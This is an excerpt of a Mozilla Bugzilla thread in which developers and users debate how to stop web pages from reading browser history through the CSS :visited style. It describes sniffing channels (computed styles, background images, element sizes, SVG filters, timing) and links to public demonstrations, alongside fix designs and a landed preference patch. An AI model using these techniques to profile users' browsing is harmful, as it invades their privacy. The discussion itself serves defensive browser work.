Jordan, a hashkey-based query into the DB, searching for a string which is indexed, may well be faster than parsing the URL and finding out the domain, yes. bz was saying that you need to base this on actual tests (coding it up and measuring speed), not just guesses.
That said, I think that speed is no real argument, given the threat that this bug represents, as shown by several public proof of concepts now.
Comment 93•16 years ago
|
||
Note that you can also do it the other way around: If DB lookup is faster, you can do that first, and only when you find a "visited" link, compare the domain and decide whether to show/treat it as visited.
Comment 94•16 years ago
|
||
I am surprised to see that the long discussion is ongoing while a patch (backend patch, v.1 on 2002-05-28) is available from the beginning and not committed. The patch is imperfect, but it is better than no patches, isn't it? Personally, it will probably be fine for me if :visited pseudoclass (and VLINK attribute and the like) is completely ignored, since some web sites assign the same style for :link and :visited anyway and those sites do not irritate me much.
Assignee | ||
Comment 95•16 years ago
|
||
(In reply to comment #94)
> committed. The patch is imperfect, but it is better than no patches, isn't it?
No.
Comment 96•16 years ago
|
||
(In reply to comment #95)
> > committed. The patch is imperfect, but it is better than no patches, isn't it?
>
> No.
Why? If I understand correctly, that 6-year-old patch provides as a bottomline an option for a user to choose privacy over the :visited support. You can discuss about a more sophisticated solution later, if you like.
Assignee | ||
Comment 97•16 years ago
|
||
Oh, the first patch. I suppose it might be worth updating that; it would pretty much need to be rewritten at this point, though.
Assignee | ||
Comment 98•16 years ago
|
||
Here's a patch for a layout.css.visited_links_enabled pref, defaulting to true.
I suppose this patch also needs a test, though.
Attachment #343901 -
Flags: superreview?(bzbarsky)
Attachment #343901 -
Flags: review?(bzbarsky)
Comment 99•16 years ago
|
||
David, thank you for your prompt replies and the updated patch. I cannot test the patch, sorry.
I think the pref added by the patch is useful for a small fraction of users, and maybe for a larger number of users if security experts inside or outside Mozilla explain the issue.
Updated•16 years ago
|
Attachment #343901 -
Flags: superreview?(bzbarsky)
Attachment #343901 -
Flags: superreview+
Attachment #343901 -
Flags: review?(bzbarsky)
Attachment #343901 -
Flags: review+
Comment 100•16 years ago
|
||
Comment on attachment 343901 [details] [diff] [review]
patch for a pref
Looks good. Should be simple to test with mochitest, right?
Comment 101•16 years ago
|
||
I'm interested to see what links I've visited, but I don't care about fancy styles. A different colour for visited links is enough, and if a page queries the colour it can be told the unvisited colour, or if the data type allows, it can be told both colours.
Comment 81, https://bugzilla.mozilla.org/show_bug.cgi?id=147777#c81 , mentions http://www.mikeonads.com/2008/07/13/using-your-browser-url-history-estimate-gender/ which requires javascript, and sends an http request of the form http://www.mikeonads.com/gender/analyze.php?sites= with a list of some of the sites from your history.
Allowing people to read the browser history is serious. Disabling all visited link styles except colour, and faking the colour when queried seems simple enough. Why is this still not fixed after nearly six and a half years?
Web pages can read the colors of pixels rendered in the page using SVG filters and the elementFromPoint API. It's a simpler variant of the following attack on cross-origin IFRAMEs:
http://lists.w3.org/Archives/Public/www-svg/2008Sep/0112.html
The cross-origin IFRAME attack would not work in Firefox today because we don't support pointer-events, but examining content in the same page *would* work today in Firefox 3 if someone coded it up.
Oh, sorry, that does still depend on pointer-events, so it doesn't work in Firefox yet. But the point is, relying on colors not being recoverable by the Web content is not a good idea. (There are other features that would also enable that, like the ability to draw SVG content to a canvas, which Opera supports and we'll want to add at some point.)
Comment 104•16 years ago
|
||
The content on a page should not be able to read the actual colour of links. If it wants to do awkward things like reading individual pixels, then maybe the browser should take the relatively expensive approach of allocating some more memory and re-rendering the whole page with all links in their unvisited colour. But then if the reads of individual pixels effect rendering you get a recursive problem and it might take a huge amount of resources to fully render.
Perhaps as soon as there is a call to read a pixel it switches to a double-rendering mode where 2 bitmaps are maintained, and most rendering is copied into both. One is displayed, and link colour depends on whether the link has been visited. The other uses the unvisited colour. Pixel reads would be from that second bitmap.
Or perhaps the option to only allow colour changes should also disable pixel reads.
Comment 105•16 years ago
|
||
Regarding "SupportVisitedPseudo", could we have an override at the docshell level (perhaps on nsIMarkupDocumentViewer, but event better if cascading like allowImages, allowJavascript & company)?
BTW, I'm still convinced that an efficient implementation of the SafeHistory approach would be the way to go.
Assignee | ||
Comment 106•16 years ago
|
||
I landed the pref patch: http://hg.mozilla.org/mozilla-central/rev/30d9ff763b22 .
Followups on the pref should probably go in different bugs.
Comment 107•16 years ago
|
||
SafeHistory stops you seeing what links you've visited in several cases when you would like to know, and allows the page to see in several cases when it shouldn't.
Reading pixels is clearly awkward, and so may incur extra cost, because the rendered page contains information that only the user should see.
Comment 108•16 years ago
|
||
(In reply to comment #107)
> SafeHistory stops you seeing what links you've visited in several cases when
> you would like to know
still better than not knowing anywhere, like a global preference implies.
> and allows the page to see in several cases when it
> shouldn't.
Would you care to explain? if you visited a certain site following a link on my own site, what kind of extra information do I gain by spying on :visited stuff (provided that you've got JS enabled and therefore I can log every click)?
> Reading pixels is clearly awkward, and so may incur extra cost, because the
> rendered page contains information that only the user should see.
I hope and assume that any proposal of reading pixels does not cross domain boundaries (i.e. I shouldn't be able to take a screenshot of cross-site frames, right?). That said, pixels colors are just one way to leak :visited status info: the "classic" scriptless attack, for instance, uses background images to perform direct CSS-only logging.
Comment 109•16 years ago
|
||
I don't have a suggestion about how to fix it, but I have one note...
You could effectively use this bug to out the author of an anonymous blog, by searching history for the posting interface of the blog and calling home if you get a winner -- or perhaps employ it to search for people who've recently viewed Wikileaks submission policy.
Kill it. Kill it with fire. There's no such thing as overkill here.
Comment 110•16 years ago
|
||
This may be an issue, but it's rather a standard w3c feature.
If you are so much concerned with privacy, why use history at all? Disable that (in preferences) and be secured not only against this feature, but even against a fbi raid (as for wikileaks;p).
Comment 111•16 years ago
|
||
My distress isn't for myself -- *I*, having read Mozilla bug #147777 last Saturday, am now aware of the problem and can take the proper precautions. (Although my ignorance of it for the past six years and six months distresses me.)
The stock solution -- to provide a preference that can be enabled to protect yourself, possibly even referencing that preference in the user interface -- isn't enough in this case. There's no good way to educate people about it, even by putting a big honking disclaimer in the install process; they'll forget it, or not understand it and click through it, and once they've done that they'll never consider it, ever again.
Even if you have it default off, they'll turn it on and then... never remember it. Goodness knows there's Mozilla preferences I only remember when I sit down to a fresh install and roundly curse all of your names. <g>
This is going to get somebody hurt -- I'll grant that it not having done so in six years is not a good support for my assessment of the problem's urgency, but we haven't been safe, we've been /lucky/.
Comment 112•16 years ago
|
||
From the W3C CSS specs (about :visited):
Note. It is possible for style sheet authors to abuse the :link and :visited pseudo-classes to determine which sites a user has visited without the user's consent.
UAs may therefore treat all links as unvisited links, or implement other measures to preserve the user's privacy while rendering visited and unvisited links differently. See [P3P] for more information about handling privacy.
Is there any patch planned for this bug any time soon ???
Comment 113•16 years ago
|
||
The easiest way to fix this would be to only consider links within the same domain as :visited.
Comment 115•16 years ago
|
||
Please do not "fix" this issue in normal browsing mode by restricting :visited links to same domain links! The design and usability pattern of :visited links is old and useful, everybody got used to it.
I think, the best option would be to leave :visited link functionality as it is in normal browsing mode, but make it restricted in Safe Browsing mode (as it's done in Safari and IE8). If user seriously concernes his privacy, he would use Safe Browsing mode.
There're some screenshots and detailed description: http://sharovatov.wordpress.com/2009/04/21/startpaniccom-and-visited-links-privacy-issue/
Comment 116•16 years ago
|
||
(In reply to comment #115)
> I think, the best option would be to leave :visited link functionality as it is
> in normal browsing mode, but make it restricted in Safe Browsing mode (as it's
> done in Safari and IE8). If user seriously concernes his privacy, he would use
> Safe Browsing mode.
I'm not sure if by safe browsing mode you are referring to private browsing mode or not, but if that's the case, we already do that. Inside private browsing mode, no link would be displayed as visited, no matter if the visit has happened before or after entering the private browsing mode.
Comment 117•16 years ago
|
||
"If user seriously concernes his privacy, he would use
Safe Browsing mode."
OK, then maybe we should not be concerned about any cross-site information leaks ... If a user distrusts a site, he will use private browsing mode.
This kind of thinking really exceeds my worst expectations ...
Comment 118•16 years ago
|
||
Let's not let this degenerate into a flamewar, but I think that comment 115 has a valid point which is that there is a very real tradeoff here between security and working according to what is expected user behaviour.
The norm for the last donkey's years on every browser has been that visited links are always shown as visited whether or not they're on the same domain as what you're currently viewing. To break this feature is breaking one of the most useful visual feedback aspects of a web browser.
Simple example: If you do a Google search, you have immediate feedback on whether or not you have previously visited a search result even before you read it. That's a huge benefit and it's just the first example I could think of.
I'm not familiar with the backend coding aspect but it seems to me that a better and more user friendly approach would be to modify the implementation of the GetComputedStyle function to prevent this attack rather than making the :visited feature more or less useless.
Comment 119•16 years ago
|
||
Ehsan, yes, I do mean private browsing mode. And no, it's not protecting from
this issue. At least, in Firefox 3.1 Beta 3.
Here’s a testcase - http://sharovatov.ru/testcases/visitedIssueTest.html
I visited both http://ya.ru and http://www.google.com links in IE8 InPrivate
mode, then went to the testcase page and it didn’t tell anything as if I hadn’t
visited these URLs. In Firefox 3.1 Beta 3 Private Browsing mode it showed that
I visited both sites.
Screenshots:
http://sharovatov.ru/screenshots/visitedIssueIE8.png
http://sharovatov.ru/screenshots/visitedIssueFF.png
Jens, your point is not valid. This issue with visited links is known since
year 2000? Maybe even earlier? There's still no good solution to it while all
the XSS issues are fixed without any problems. And private browsing mode wasn't
invented just because somebody thought it was a nice option - it was
implemented because people wanted to browse sites without any traces in history
or wherever. Don't you see that private browsing mode fully solves this
"issue"? If I use facebook, flickr, digg, I can be found there even without
this :visited link issue. But if I'm about to visit my internet banking site,
I'll use the safest browser and the safest mode it's got. That's what users
should be taught.
Comment 120•16 years ago
|
||
@#115 & #116: I don't think this has a lot to do with "Safe Mode". Safe Mode/Private Browsing Mode is what I'd use if I didn't trust my host system, not if I want to browse securely. If I have my host system's drives running in something like truecrypt or dmcrypt or whatever and I knew I was the sole user of the system, is there any reason I would ever want to use Safe Mode?
Limiting :visited to the same domain is something which I'd want to do regardless of me being in Private Browsing Mode or not. I agree it breaks a common pattern, but IMHO added security is a reason to do this. Systems, browsers, etc. should be secure by default.
If it's only done in Private Browsing Mode, I hope it'll be possible to change some about:config value to always enable it in normal mode. Regardless, I'm not convinced it shouldn't be the default for "normal mode" as well - AFAIK Private Browsing Mode is only about not saving information on the host system. (And even if it wasn't, "normal mode" should still be free of privacy leaks by default.)
@#118: I can see this being annoying for sites like Google Search. FF integrates with some blacklisting engine, i.e. it shows a warning about a site being unsafe. Maybe as a default, ":visited for other domains" can be disabled on sites which are in this blacklist?
Comment 121•16 years ago
|
||
"but it seems to me that a
better and more user friendly approach would be to modify the implementation of
the GetComputedStyle function to prevent this attack"
Yes. I think implementation or at least design work on that is ongoing. I remember some discussion about that in this bug.
Comment 122•16 years ago
|
||
(In reply to comment #119)
> Ehsan, yes, I do mean private browsing mode. And no, it's not protecting from
> this issue. At least, in Firefox 3.1 Beta 3.
>
> Here’s a testcase - http://sharovatov.ru/testcases/visitedIssueTest.html
>
> I visited both http://ya.ru and http://www.google.com links in IE8 InPrivate
> mode, then went to the testcase page and it didn’t tell anything as if I hadn’t
> visited these URLs. In Firefox 3.1 Beta 3 Private Browsing mode it showed that
> I visited both sites.
>
> Screenshots:
> http://sharovatov.ru/screenshots/visitedIssueIE8.png
> http://sharovatov.ru/screenshots/visitedIssueFF.png
Are you sure that you had actually entered the private browsing mode? If you had, your window title should have had "(Private Browsing)" (or an equivalent text in your locale) at its end, but in the screenshot that you have posted, that is not the case.
To enter the private browsing mode, please use the Tools > Start Private Browsing menu item. Let me know if this doesn't solve the issue.
Comment 123•16 years ago
|
||
(In reply to comment #118)
> I'm not familiar with the backend coding aspect but it seems to me that a
> better and more user friendly approach would be to modify the implementation of
> the GetComputedStyle function to prevent this attack rather than making the
> :visited feature more or less useless.
Only modifying getComputedStyle() would be pointless IMO. :visited isn't limited to changing colors - it can change the size of an element as well for example and then it is a matter of simply checking offsetHeight of the element. Of course one could limit :visited to "simple" CSS properties (probably meaning only color and background). But even then one could use a canvas to make a "screenshot" of the current page and get the color values of the pixels. In other words, I don't think that allowing the site to display external links as visited while preventing this information from leaking out is realistic.
Comment 124•16 years ago
|
||
Ehsan, you're absolutely right, I screwed this - I was entering Firefox safe mode instead of Private mode - and thought that the safe mode would be private :) Way cool! Thanks Firefox team!
Ali, that's what I'm talking about! If the issue is fixed by restricting :visited by same-domain policy, it will hurt users experience. :visited links styled differently is a very common and widely-used visual pattern - and you mentioned a very good example - search engine results pages. I don't think that same-domain policy would work here.
Regarding your proposal to modify the implementation of getComputedStyle - how are you goint to modify it? What if I set a:visited span {display: none} stylesheet rule for <a href="http://test.com/"><span>link text</span></a> link and then use getComputedStyle to get the current style of my span?
Comment 125•16 years ago
|
||
@Wladimir:
last time I checked, taking canvas screenshots (via drawWindow(), I guess) was not allowed to content scripts.
However trying to prevent leakage at the getComputedStyle() level, like you said, is wasted time except for entirely dropping :visited support, which is totally unrealistic.
On the other hand there's a middle ground in limiting visited links feedback, which is more bearable than disabling it outright for cross-site links: it's disabling them only if they've never been visited *from* the site you're currently displaying (no matter if they're same origin or not). This way you don't disclose any additional information that the site could not "legitimately" collect by monitoring your clicks.
This approach, as far as I know, is easy to implement with the current Places database, which traces the referer of each visited link, and is also the one pioneered by the SafeHistory extension.
Comment 126•16 years ago
|
||
Giorgio, let's say I was searching for some stuff on MSN Live Search, visited 100 sites from the search results, then I went to Google to search for the same stuff. All the links that I visited from MSN Search won't be marked as visited in google search results. Is it what you're proposing?
P.S. this is only one simple usecase where :visited support can't be restricted to same-domain or same-referer policy.
Comment 127•16 years ago
|
||
(In reply to comment #125)
> @Wladimir:
> last time I checked, taking canvas screenshots (via drawWindow(), I guess) was
> not allowed to content scripts.
Only for cross-domain invocations. There are no restrictions on taking screenshots of your own site and analyzing the data, unless I missed a recent behavior change of course.
> On the other hand there's a middle ground in limiting visited links feedback,
> which is more bearable than disabling it outright for cross-site links: it's
> disabling them only if they've never been visited *from* the site you're
> currently displaying (no matter if they're same origin or not). This way you
> don't disclose any additional information that the site could not
> "legitimately" collect by monitoring your clicks.
Last time I checked, Places lookups weren't the fastest thing on earth. See also comment 84.
Comment 128•16 years ago
|
||
(In reply to comment #125)
> This approach, as far as I know, is easy to implement with the current Places
> database, which traces the referer of each visited link, and is also the one
> pioneered by the SafeHistory extension.
SafeHistory doesn't work anymore thanks to places, see bug 320831 for details.
Comment 129•16 years ago
|
||
(In reply to comment #128)
> SafeHistory doesn't work anymore thanks to places, see bug 320831 for details.
Nonetheless a relational database to track visits like Places makes implementing a SafeHistory-like built-in feature trivial, if developers are motivated to do it and have some basic SQL skills.
(In reply to comment #127)
> (In reply to comment #125)
> > @Wladimir:
> > last time I checked, taking canvas screenshots (via drawWindow(), I guess) was
> > not allowed to content scripts.
>
> Only for cross-domain invocations. There are no restrictions on taking
> screenshots of your own site and analyzing the data
That's wrong (fortunately): http://mxr.mozilla.org/mozilla/source/content/canvas/src/nsCanvasRenderingContext2D.cpp#2352
@Vitaly:
yes, that's what I and security people from Stanford (http://crypto.stanford.edu/sameorigin/ ) are proposing. As I said, it's a
bearable middle ground which works fine with your first Google use case but of
course breaks other, arguably less impacting but not necessarily unimportant
ones. Can you suggest a better, effective and realistic approach?
Comment 130•16 years ago
|
||
Guys, comments 118 through 129 basically just repeat things that have already been said in this bug. Congrats. You've now sent a total of abut 1000 e-mails (94 ccs, plus all the watchers * 12), made this bug that much harder to fix (10% more comments to read), and had your chance to say Important Things that everyone Absolutely Must Read.
Now please, unless you're adding something _new_ to this bug, do not comment on it.
Updated•16 years ago
|
Assignee | ||
Updated•16 years ago
|
Whiteboard: [sg:want P4] → [sg:want P4][please read comments 12, 23, 35, 43, 65-68, 70 before commenting]
Assignee | ||
Updated•16 years ago
|
Whiteboard: [sg:want P4][please read comments 12, 23, 35, 43, 65-68, 70 before commenting] → [sg:want P4][please read comments 12, 23, 35, 43, 65-68, 70, 102-103 before commenting]
Comment 131•15 years ago
|
||
Hi! I've read through all the comments and a few blogs, and I don't think I've seen this mentioned anywhere: the only way to still keep the functionality of and to get protection from anything* a page's content might do is to simply have the highlighting completely outside the page:
1) Render everything as if the links were not visited.
2) Display an overlay above the window that highlights visited windows. This can be anything (from a contrasting border to a scrolling marquee to alpha blended shining rays), as long as it's completely separate from the page.
Trusted extensions might have access** to it, but nothing inside the page can tell that it's there*. Anything the page does, including querying properties, loading backgrounds and looking at individual pixels would happen exactly as if the links were unvisited.
[*: except doing real screenshots, which would be silly to allow, and timing attacks, which are always hard (both to do and to prevent).]
[**: they might customize the look, or highlight otherwise interesting (e.g. dangerous or secure) links.]
This would probably be slower, but it can be just an option for users who really want protection. It might be the default for incognito mode, for instance. Anyway, it's the only way to absolutely prevent the attack: strictly separate what the user sees from what's on the page.
(By the way, this might be useful for preventing whatever information the user must see that the page shouldn't; for instance, I think reading pixels might allow a page to read auto-completed forms even if the user never clicks 'send'.)
Comment 132•15 years ago
|
||
(In reply to comment #131)
> Hi! I've read through all the comments and a few blogs, and I don't think I've
> seen this mentioned anywhere: the only way to still keep the functionality of
> and to get protection from anything* a page's content might do is to simply
> have the highlighting completely outside the page:
This does slow down the attacker, but the attacker can still get private information from each click. Let's say a web page shows N hyperlinks that all say "Click here to continue." The unvisited links are styled to blend in with the background so the user can't see them. The visited links are visible because of the visited link styling, so the user only see the visited ones. Then the attacker can find out where the user's been by which link they click on.
Comment 133•15 years ago
|
||
what do you think about limit the visibility of "visited" for a domain A to other domains that were visited having A as referer? I think it is a bit better that just restricting it to same domain.
If I am on a website A and I click on a link to another website B, it would be nice if any link to B can be seen as "visited" by A.
Comment 135•15 years ago
|
||
Comment #133 sounds like a very good option.
Comment 136•15 years ago
|
||
Comment #133 seems vulnerable:
Site www.alice.com makes a link to www.bob.com/404. She either tricks the user into clicking it, or follows it programmatically. Now www.alice.com can tell whether the user has been to www.bob.com/secret
Comment 137•15 years ago
|
||
Maybe there should be an option to disable all visited link styles except colour, and then it could render the page away from the screen with all links in the unvisited state, copy it to the screen, and then apply the visited colours. Any pixel reads would read the version in non-screen memory.
Any script that wanted to read pixels and do clever things might corrupt the appearance of the page, or it might be too difficult to work out where the link ended up, which would be needed to apply the colour, but the creators of such pages could avoid these problems by setting the visited and unvisited colours the same.
This seems to fix all the vulnerabilities. It should be the default, even though it breaks the spec, because people should not have their privacy violated unless they agree, even if a specification says they should.
Assignee | ||
Comment 138•15 years ago
|
||
That still doesn't solve timing channel attacks (see, e.g., test #3, which still works some of the time for me, and could probably be made more reliable).
Comment 139•15 years ago
|
||
I don't understand that test fully, but it seems to involve accessing a data structure about the page. If the data structure accessible to the page says all links are unvisited, whether they are or not, or if those fields are not read but spoofed, and all relevant code is designed to take the same time to run, then no timing attacks should be possible, unless they involve CPU cache. I don't see why there would be a timing vulnerability involving the cache, but if there is it can probably be compensated for.
Comment 140•15 years ago
|
||
Yes, one standard academic research solution to timing channels is "cross-copying", padding alterative control flows with skip instructions.
No, this is not all that easy to implement, and it is not yet implemented in Gecko. Good luck getting all browsers to agree while also competing on ultimate best performance!
Timing channels are notoriously hard to close. Leaking a few bits slowly can leak enough over time to compromise sensitive secrets. This is still a research topic.
/be
Comment 141•15 years ago
|
||
If the page reads the structure, or does some rendering that depends on visited state, the actual value in the structure would not be read, and it would be spoofed as unvisited. The final stage of adding link colour would be after the page had finished rendering (into non-display memory), so it would be more difficult to time. I suppose someone could put the same link 10,000 times on the page and try to time the rendering, but I don't see how they would time it and anyway when re-rendering the page to add link colour as in Comment #137, it could do all the links, or even do all with both colours, with the correct colour last. I don't see how any timing attack would work.
Comment 144•15 years ago
|
||
The exploitability is public once more: http://draketo.de/light/english/your-browser-history-can-be-sniffed-64-lines-python-tested-firefox-353
Please fix it ASAP, so I can change the site to "Firefox is now immune".
Assignee | ||
Comment 145•15 years ago
|
||
Some thoughts on a fix:
Define an element's "relevant link" as:
* if the element is a link, it is its own "relevant link"
* otherwise, if it has an ancestor that is a link, it is the *nearest* such ancestor
* otherwise, it is null.
For every element that has a relevant link, we resolve style twice:
* once as though all links in the document are unvisited
* once as though all links except the relevant link are unvisited and the relevant link is visited
We make the first style context the frame's primary style context, but give that style context a pointer to the second. We also store in the style context whether the relevant link is actually visited.
(NOTE: This disables support for any selectors involving link visitedness and sibling combinators and also disables support for any selectors involving nested links and visitedness on the non-innermost.)
Then, when *drawing*:
* text
* border
* background-color
we call a ***non-inline*** function like:
GetAppropriateColor(PRUint32 aIndex, nscolor aColors[2], nscolor aAlphaColor)
{
nscolor color = aColors[aIndex];
return NS_RGBA(NS_GET_R(color), NS_GET_G(color), NS_GET_B(color),
NS_GET_A(aAlphaColor));
}
in a manner something like:
nsStyleContext *primarySC = aFrame->GetStyleContext();
nscolor colors[2];
colors[0] = primarySC->GetStyleColor()->mColor;
nsStyleContext *visitedSC = primarySC->GetVisitedStyle();
if (visitedSC) {
colors[1] = visitedSC->GetStyleColor()->mColor;
} else {
colors[0] = priColor;
}
nscolor drawColor =
GetAppropriateColor(primarySC->IsVisited(), colors, colors[0]);
Comment 146•15 years ago
|
||
Why don't you just load all linked elements, regardless of their visitedness state?
* Load everything which is linked in the stylesheet and put it into a cache.
* Let the display code only access stuff inside that cache.
This wouldn't have to slow anything - the internal code would load the same way it does now, but some resources would block until they are in the cache.
Example:
Stylesheet:
.blah {background: url(unvisited.png)}
.blah:visited {background: url(visited.png)}
Both unvisited.png and visited.png get loaded from the web at the same time (so no private information gets leaked), but the display code only accesses one of them. If one isn't available yet, it looks to the display code, as if loading were simply taking longer.
This also has the advantage that a change in the state of an element doesn't require accessing the server again (more responsive websites).
Assignee | ||
Comment 147•15 years ago
|
||
(In reply to comment #146)
> Why don't you just load all linked elements, regardless of their visitedness
> state?
Why don't you read the whole bug report before acting like you know everything about the problem?
Comment 148•15 years ago
|
||
> Why don't you read the whole bug report before acting like you know everything about the problem?
I should have done that, sorry - I broke off after the first 20 comments or so. It's just too easy to think something would be easy to fix without knowing the codebase... and it's also far too easy to forget how hard it is to write a modern (and well-working) HTML-renderer - especially since basic HTML and CSS is deceptively easy to write.
I'm sorry for the noise.
Assignee | ||
Comment 149•15 years ago
|
||
A few more additions to comment 145:
* I wasn't necessarily saying we need to explicitly calculate the "relevant node"; it can be implicitly calculated during SelectorMatchesTree, by tracking whether we're still looking for it or not.
* we need to match anything that's either :link or :visited in HasStateDependentStyle or HasAttributeDependentStyle
* we need to make ReResolveStyleContext reresolve check both contexts for pointer equality and CalcDifference
* we need to make sure that the style context's visited boolean (probably part of mBits) is checked when we're doing the sibling sharing optimization
Comment 150•15 years ago
|
||
(In reply to comment #145)
> Then, when *drawing*:
> * text
> * border
> * background-color
Are we sure that these are the only cases which matter in the type of attack we're trying to block here?
(I'm assuming that this plan is intended to block the pixel color attacks, please correct me if I'm wrong.)
Assignee | ||
Comment 151•15 years ago
|
||
(In reply to comment #150)
> (In reply to comment #145)
> > Then, when *drawing*:
> > * text
> > * border
> > * background-color
>
> Are we sure that these are the only cases which matter in the type of attack
> we're trying to block here?
I'm saying these are the only cases that *don't* matter in the type of attack we're trying to block. In other words, they're the only cases for which we'll differentiate between visited and unvisited links.
> (I'm assuming that this plan is intended to block the pixel color attacks,
> please correct me if I'm wrong.)
No, it's not intended to fix any attacks that involve user interaction.
Comment 152•15 years ago
|
||
(In reply to comment #151)
> (In reply to comment #150)
> > (In reply to comment #145)
> > > Then, when *drawing*:
> > > * text
> > > * border
> > > * background-color
> >
> > Are we sure that these are the only cases which matter in the type of attack
> > we're trying to block here?
>
> I'm saying these are the only cases that *don't* matter in the type of attack
> we're trying to block. In other words, they're the only cases for which we'll
> differentiate between visited and unvisited links.
I'm sure that this has been stated somewhere in the pile of comments on this bug, but I did my best and couldn't find it - so please excuse me if I need to ask what type of attack is your suggestion trying to block?
> > (I'm assuming that this plan is intended to block the pixel color attacks,
> > please correct me if I'm wrong.)
>
> No, it's not intended to fix any attacks that involve user interaction.
Hmm, I meant an attack performed by retrieving the color of a particular pixel by using SVG filters for example. That doesn't require user interaction, does it?
Assignee | ||
Comment 153•15 years ago
|
||
It's intended to address attacks such as those in the attachments labeled "test #1" through "test #4" -- attacks where entries in the history can be determined through script, without user interaction.
I suppose it doesn't address SVG filters, though, since one could probably use SVG filters to convert color differences into transparency differences and then learn something about the transparency by measuring performance characteristics of drawing it.
(In reply to comment #153)
> I suppose it doesn't address SVG filters, though, since one could probably use
> SVG filters to convert color differences into transparency differences and then
> learn something about the transparency by measuring performance characteristics
> of drawing it.
I don't think you could actually do timing analysis here, we don't do any optimizations based on inspecting alpha values and I don't think we'll start doing so.
However, if we add support for pointer-events values that make hit testing depend on pixel transparency, then elementFromPoint could be used to test transparency, and hence color. I think we can burn that bridge when we come to it.
Comment 155•15 years ago
|
||
(In reply to comment #145)
This sounds good, though personally I will probably continue disabling :visited completely (I am now used to it).
How much better in practice is this method than only considering the link itself as relevant?
Related to this, is there any statistics on how :visited is used in web pages in the real world? Such statistics will be very useful to decide what to do with this bug.
In addition, if you go with that method, please make the logic customizable by an extension if possible and reasonable, because no logic will be suitable in every situation.
Assignee | ||
Comment 156•15 years ago
|
||
(In reply to comment #155)
> How much better in practice is this method than only considering the link
> itself as relevant?
Much, since then 'color' wouldn't work, since the color actually applies to the text inside the link, not the link itself.
> Related to this, is there any statistics on how :visited is used in web pages
> in the real world? Such statistics will be very useful to decide what to do
> with this bug.
I don't know, beyond that large numbers of sites distinguish visited links based on colors.
How would they be useful? What decisions might be made differently based on such statistics?
> In addition, if you go with that method, please make the logic customizable by
> an extension if possible and reasonable, because no logic will be suitable in
> every situation.
Not a chance. It's performance-sensitive code, and it may be run at times when it's inappropriate to call into script.
Comment 157•15 years ago
|
||
Speaking about extensions, could nsIGlobalHistory2::isVisited() be changed to
take a second (optional) "referrer" URI parameter and the call from
nsDocShell::GetLinkState() to pass it currentURI?
This way an extension overriding the global history service could easily
implement a SafeHistory-like policy.
Assignee | ||
Comment 158•15 years ago
|
||
(In reply to comment #157)
> Speaking about extensions, could nsIGlobalHistory2::isVisited() be changed to
> take a second (optional) "referrer" URI parameter and the call from
> nsDocShell::GetLinkState() to pass it currentURI?
> This way an extension overriding the global history service could easily
> implement a SafeHistory-like policy.
Sounds reasonable to me; not sure how much we want to pile into this one bug.
Comment 159•15 years ago
|
||
(In reply to comment #156)
> (In reply to comment #155)
> > How much better in practice is this method than only considering the link
> > itself as relevant?
>
> Much, since then 'color' wouldn't work, since the color actually applies to the
> text inside the link, not the link itself.
I see. I did not know how styling works.
> > Related to this, is there any statistics on how :visited is used in web pages
> > in the real world? Such statistics will be very useful to decide what to do
> > with this bug.
...
> How would they be useful? What decisions might be made differently based on
> such statistics?
Such statistics would be useful to answer the questions such as:
* Does supporting border-color do any good?
* Which properties other than colors are worth supporting? How about text-decoration or border-style, for example?
* Are the cases involving the sibling selectors worth considering? (Maybe not, but the point is that it could be based on the actual data.)
Assignee | ||
Comment 160•15 years ago
|
||
(In reply to comment #159)
> * Which properties other than colors are worth supporting? How about
> text-decoration or border-style, for example?
Those are both detectable through performance characteristics. Allowing them to be set would not fix the exploit in any useful way.
> * Are the cases involving the sibling selectors worth considering? (Maybe not,
> but the point is that it could be based on the actual data.)
If I knew a reasonable way to do it, that would be a question worth asking, but I don't. Do you? I don't think it can be done without significant increase in code complexity for something that I'm reasonably confident is quite rare (although I don't know exactly how rare).
Comment 161•15 years ago
|
||
(In reply to comment #160)
> (In reply to comment #159)
> > * Which properties other than colors are worth supporting? How about
> > text-decoration or border-style, for example?
>
> Those are both detectable through performance characteristics.
I did not know that. If so, I agree that this question is irrelevant because we cannot handle these properties anyway.
> > * Are the cases involving the sibling selectors worth considering? (Maybe not,
> > but the point is that it could be based on the actual data.)
>
> If I knew a reasonable way to do it, that would be a question worth asking, but
> I don't. Do you?
I do not either, but I think that you or someone else can come up with a clever way to handle those cases if necessary, especially if we know a common usage pattern.
Comment 162•15 years ago
|
||
(In reply to comment #159)
> * Which properties other than colors are worth supporting? How about
> text-decoration or border-style, for example?
I'm pretty sure that websites are using a very large amount of properties in :visited - but I guess it would be best to actually go out and pull definitions from real cases and analyze those.
Assignee | ||
Comment 163•15 years ago
|
||
The question isn't what properties are used with :visited, but what properties are used with :visited whose values are different from those used on :link. Selectors like ":link, :visited" are common, but those won't be affected by this approach.
Comment 164•15 years ago
|
||
Sorry to clutter any inboxes, but this issue has gotten some pretty widespread exposure due to the site http://didyouwatchporn.com/.
Comment 165•15 years ago
|
||
Maybe a superfluous comment, similar to the previous and the bug’s URL, but don’t see this particular site mentioned before:
http://www.whattheinternetknowsaboutyou.com/top20k
Incredible how fast it is and how many results it returns. Also works without JavaScript. Many more results than from the site in the previous comment :). (Had just one there, “myfreecams”? Must’ve been an ad banner or popup. Honestly!)
Comment 166•15 years ago
|
||
I don't think my comment ever got posted but my solution would be to build in the idea behind SafeHistory with the option for the user to turn it on in security settings and a link explaining what will happen if it's turned on like AcidTest3. It's not really a bug in Firefox it's a bug in the HTML spec that should be closed but in the mean time this QAD solution works just fine. Firefox will be the only browser that would be capable of blocking this exploit then.
We can't fix it because the spec is broken so lets work around it in the meantime.
Comment 167•15 years ago
|
||
The spec is so badly broken here that for once I say toss the spec. Protecting users' privacy is far more important. I wouldn't even suggest spec compliance as an option.
Comment 168•15 years ago
|
||
Excuse my bluntness, but you are arguing about this issue for almost 8 years now.
What I see from the user perspective is a serious, serious privacy issue.
So what I want you do is make a setting in about:config similar to browser.send_pings. This setting removes or restricts the access to the relevant css property. This will break websites that rely on this, but this is acceptable, as it will not be set by default. This has to be built into the next release and not just offered by a patch.
Once you have done that, you can go on implementing some fancy same-origin-policy approach, SafeHistory, SafeCache, whatever.
Assignee | ||
Comment 169•15 years ago
|
||
(In reply to comment #168)
> So what I want you do is make a setting in about:config similar to
> browser.send_pings. This setting removes or restricts the access to the
Sounds like you want layout.css.visited_links_enabled , which has been around for a while (comment 106).
Comment 170•15 years ago
|
||
(In reply to comment #169)
I was not aware of this. It is not perfect, because it not only restricts read access from the api but also does not display link colors to the user.
But hey, this is exactly what I have been looking for.
Thank you for the hint and sorry for the bug tracker chatter.
